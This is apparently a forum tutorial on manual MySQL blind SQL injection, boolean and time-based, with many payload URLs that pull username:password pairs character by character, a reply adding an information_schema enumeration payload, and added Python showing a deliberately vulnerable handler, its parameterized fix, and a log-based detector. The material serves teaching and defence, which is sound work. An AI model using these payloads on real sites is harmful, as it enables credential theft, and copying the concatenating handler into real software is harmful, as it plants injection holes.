
MySQL: Blind Injection steps - Manually


While preparing for an upcoming presentation, I came across Blind SQL Injection. I found the following steps helpful, and you might find them useful too.

There are 2 types of Blind SQL Injection:
1. Normal Blind => You get a TRUE/FALSE response depending on the outcome of the SQL query; the difference is visible as a change in the page.
2. Totally Blind => The page output does not change between a TRUE and a FALSE condition.

1. Normal Blind:
Vulnerable URL:

hxxp://site/page.php?id=1

TRUE Response:
hxxp://site/page.php?id=1 AND 1=1

FALSE Response:
hxxp://site/page.php?id=1 AND 1=2
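The whole technique rests on that one bit of difference between the TRUE and the FALSE page. The following is an added illustration, not code from this post: SQLite (bundled with Python) stands in for MySQL, the `pages` table and its rows are constructed for the example, and `lookup_vulnerable()` mirrors a `page.php?id=` handler that concatenates the parameter into the SQL string. `lookup_hardened()` shows the fix that removes the oracle: validate the parameter's type at the edge and bind it as data with a placeholder. `has_boolean_oracle()` checks whether appending a true and a false condition yields different responses, which is exactly what the steps below depend on.

```python
import sqlite3

# Added example, not the post's code. SQLite stands in for MySQL here; the
# concatenation flaw and the placeholder fix work the same way with a MySQL driver.


def setup_db():
    """Constructed sample data standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "About")])
    return conn


def lookup_vulnerable(conn, id_param):
    """page.php?id=... built by string concatenation: the parameter becomes SQL text,
    so '1 AND 1=2' changes the WHERE clause and the page content with it."""
    sql = "SELECT title FROM pages WHERE id = " + id_param
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(conn, id_param):
    """Reject anything that is not an integer, then bind the value as data.
    Validation alone would also stop this case; the placeholder is what keeps
    the query structure fixed no matter what string arrives."""
    try:
        page_id = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    row = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None


def has_boolean_oracle(lookup, conn, base="1"):
    """True if a TRUE and a FALSE condition appended to the parameter produce
    different responses, i.e. the application leaks one bit per request."""
    results = []
    for cond in ("1=1", "1=2"):
        try:
            results.append(lookup(conn, f"{base} AND {cond}"))
        except ValueError:
            results.append("rejected")  # both probes rejected identically: no oracle
    return results[0] != results[1]


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable handler leaks a bit:", has_boolean_oracle(lookup_vulnerable, db))
    print("hardened handler leaks a bit:  ", has_boolean_oracle(lookup_hardened, db))
```

Run stand-alone it prints True for the concatenating handler and False for the hardened one. Note that in MySQL a non-numeric string bound to an integer column is coerced with a warning, so the type check before binding is not optional there either.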

Check Version:
hxxp://site/page.php?id=1 AND substring(version(),1,1)=4 <-- FALSE response
hxxp://site/page.php?id=1 AND substring(version(),1,1)=5 <-- TRUE response
Database version is MySQL 5.x.x.

Table & Columns:
We need to guess table & column names. For this, subselects must be supported.

Check subselect:
hxxp://site/page.php?id=1 AND (select 1)=1 <-- this should be a TRUE response -- subselect supported
Guessing Table name:
hxxp://site/page.php?id=1 AND (select 1 from admin limit 0,1)=1 <-- FALSE
hxxp://site/page.php?id=1 AND (select 1 from users limit 0,1)=1 <-- TRUE
Table found 'users'.

Here we select the constant 1 from the first row, so when the table exists the subquery returns 1 and the condition is TRUE. When the table does not exist, the query errors out (an error we never get to see), so the condition is FALSE.

Guessing Columns:
hxxp://site/page.php?id=1 AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- FALSE
hxxp://site/page.php?id=1 AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- TRUE
Column 'password' found.

Here we concatenate 1 with the value of the supplied column and then check the first character with substring(). If the column exists, concat() returns '1' followed by the password of the first row, substring() pulls out the first character, which is '1', and the comparison with 1 is TRUE. If the column does not exist, the query returns nothing and the condition is FALSE.

Data Mining:

We found the table 'users' with the columns 'username' and 'password'.

hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>100 --> FALSE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>96 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>97 --> FALSE

This means 1st character is CHAR(97)='a'.

Here we first concatenate the username and password of the first row (LIMIT 0,1), giving a string of the form 'username:password', then convert its first character to its ASCII code and compare that with a number. If the response is TRUE, increase the number and check again until you get the first FALSE.

To get the 2nd character, increase the position argument of substring() and repeat the process.
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>80 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>90 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>100 --> FALSE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>100 --> FALSE

Second character is CHAR(100) = 'd'

Use a >0 comparison to detect the end of the string: once the substring position runs past the last character, the result of that comparison changes and you know you have reached the end.

2. Totally Blind:
As this type gives no visible TRUE/FALSE response, we need to use time-based injection: IF() for the condition and BENCHMARK() for the delay. These two can be used with UNION SELECT, but finding the correct number of columns is again a pain, as there is no direct method I know of.

Detecting Version:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD5(CHAR(1))),null),null ---> delay of 5 secs (TRUE)
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD5(CHAR(1))),null),null ---> no delay (FALSE)
When the condition in IF() is TRUE, the response is delayed by a few seconds compared with the one where the condition is FALSE.

Table and column guessing:
As described in 'Normal Blind', the same process can be followed here to guess the table and column names.

Table name guessing:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING((select 1 from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

Delay if the table 'users' exists, no delay if it does not.

Column name Guessing:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING((select substring(concat(1,pass),1,1) from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

Delay if the column 'pass' exists, no delay if it does not.

Getting Data:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(user,1,1)=CHAR(97),BENCHMARK(5000000, MD5(CHAR(1))),null),null FROM users limit 0,1

Delay if the first character of the 'user' column in the first row of 'users' is 'a', no delay if it is not.

This way we can mine data. As you can see, this is time consuming. Tools like SQLMap are really good at this type of operation, but it is always good to know the basics before firing up any tool. You can use the DVWA Blind SQL Injection exercise at 'Medium' security to test these attacks.
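Seen from the server side, both variants above leave a very recognisable trail: a burst of requests from one client to the same page and parameter that differ only in the number after a `>` (the binary search), and requests carrying BENCHMARK() whose response time jumps by seconds. The following detection routine is an added example and not part of the original post. It runs over constructed Apache combined-format log lines whose query strings mirror the probes shown above; the trailing response-time field in milliseconds is an assumption made for this example (a `LogFormat` ending in `%D` gives microseconds, which you would scale accordingly).

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (not real traffic). Apache combined format plus an
# assumed trailing response-time field in milliseconds. The query strings are the
# URL-encoded versions of the probes in the post above.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 12
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /page.php?id=1%20AND%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 11
203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /page.php?id=1%20AND%201=2 HTTP/1.1" 200 3010 "-" "Mozilla/5.0" 10
203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /page.php?id=1%20AND%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 14
203.0.113.7 - - [10/Oct/2023:13:55:52 +0000] "GET /page.php?id=1%20AND%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E90 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 13
203.0.113.7 - - [10/Oct/2023:13:55:54 +0000] "GET /page.php?id=1%20AND%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E100 HTTP/1.1" 200 3010 "-" "Mozilla/5.0" 12
203.0.113.7 - - [10/Oct/2023:13:55:56 +0000] "GET /page.php?id=1%20AND%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E96 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 12
203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /page.php?id=1%20UNION%20SELECT%20IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD5(CHAR(1))),null),null HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 5230
198.51.100.4 - - [10/Oct/2023:13:57:02 +0000] "GET /page.php?id=2 HTTP/1.1" 200 4800 "-" "Mozilla/5.0" 9
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "[^"]*" (?P<ms>\d+)$'
)

# Substrings a legitimate numeric id parameter never contains (compared lower-case).
SQLI_MARKERS = ("ascii(substring(", "substring(version()", "benchmark(", "sleep(",
                "information_schema", "union select", " and 1=1", " and 1=2")

# A decoded value that ends in ")" followed by a comparison against an integer,
# e.g. "...,1,1))>80": everything before the operator is the probe "template".
THRESHOLD_RE = re.compile(r"^(?P<tpl>.*\))\s*(?P<op>[<>]=?)\s*(?P<n>\d+)\s*$", re.S)

SLOW_MS = 3000             # BENCHMARK/SLEEP payload plus a response this slow = time-based probe
SWEEP_MIN_THRESHOLDS = 3   # distinct thresholds on one template = a binary search in progress


def analyze(lines):
    """Return {client_ip: {"markers": n, "sweeps": [(path, param, n_thresholds)], "slow_probes": n}}
    for every client that sent at least one request carrying an injection marker."""
    findings = defaultdict(lambda: {"markers": 0, "sweeps": [], "slow_probes": 0})
    templates = defaultdict(set)  # (ip, path, param, template) -> thresholds seen
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ip, ms = m["ip"], int(m["ms"])
        url = urlsplit(m["target"])
        # parse_qsl percent-decodes each value, so %20 and %3E become " " and ">"
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            low = value.lower()
            if not any(marker in low for marker in SQLI_MARKERS):
                continue
            findings[ip]["markers"] += 1
            if ("benchmark(" in low or "sleep(" in low) and ms >= SLOW_MS:
                findings[ip]["slow_probes"] += 1
            t = THRESHOLD_RE.match(value)
            if t:
                templates[(ip, url.path, param, t["tpl"].lower())].add(int(t["n"]))
    for (ip, path, param, _tpl), thresholds in templates.items():
        if len(thresholds) >= SWEEP_MIN_THRESHOLDS:
            findings[ip]["sweeps"].append((path, param, len(thresholds)))
    return dict(findings)


if __name__ == "__main__":
    for ip, report in analyze(SAMPLE_LOG.splitlines()).items():
        print(ip, report)
```

On the sample the routine reports the single offending client with seven marker hits, one threshold sweep of four distinct values against `id` on `/page.php`, and one slow BENCHMARK probe; the second client is not reported at all. The template grouping is what makes the sweep signal robust: the attacker changes only the number after the operator, so stripping it collapses the whole search into one key.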

Hope this helps someone, someday, somewhere.

Good. However, since the MySQL version is 5.x.x, you can take the help of information_schema to enumerate rather than guessing table names.

It need not always be users. To help you in this case,

Code:
hxxp://site.com/page.php?id=1 and ascii(substring((select group_concat(table_name) from information_schema.columns where column_name like 0x257061737325),1,1))>0
Enumerates all the table names with a column containing the string "pass". Now, this should work even if the column name is pass/passwd/password and so on.
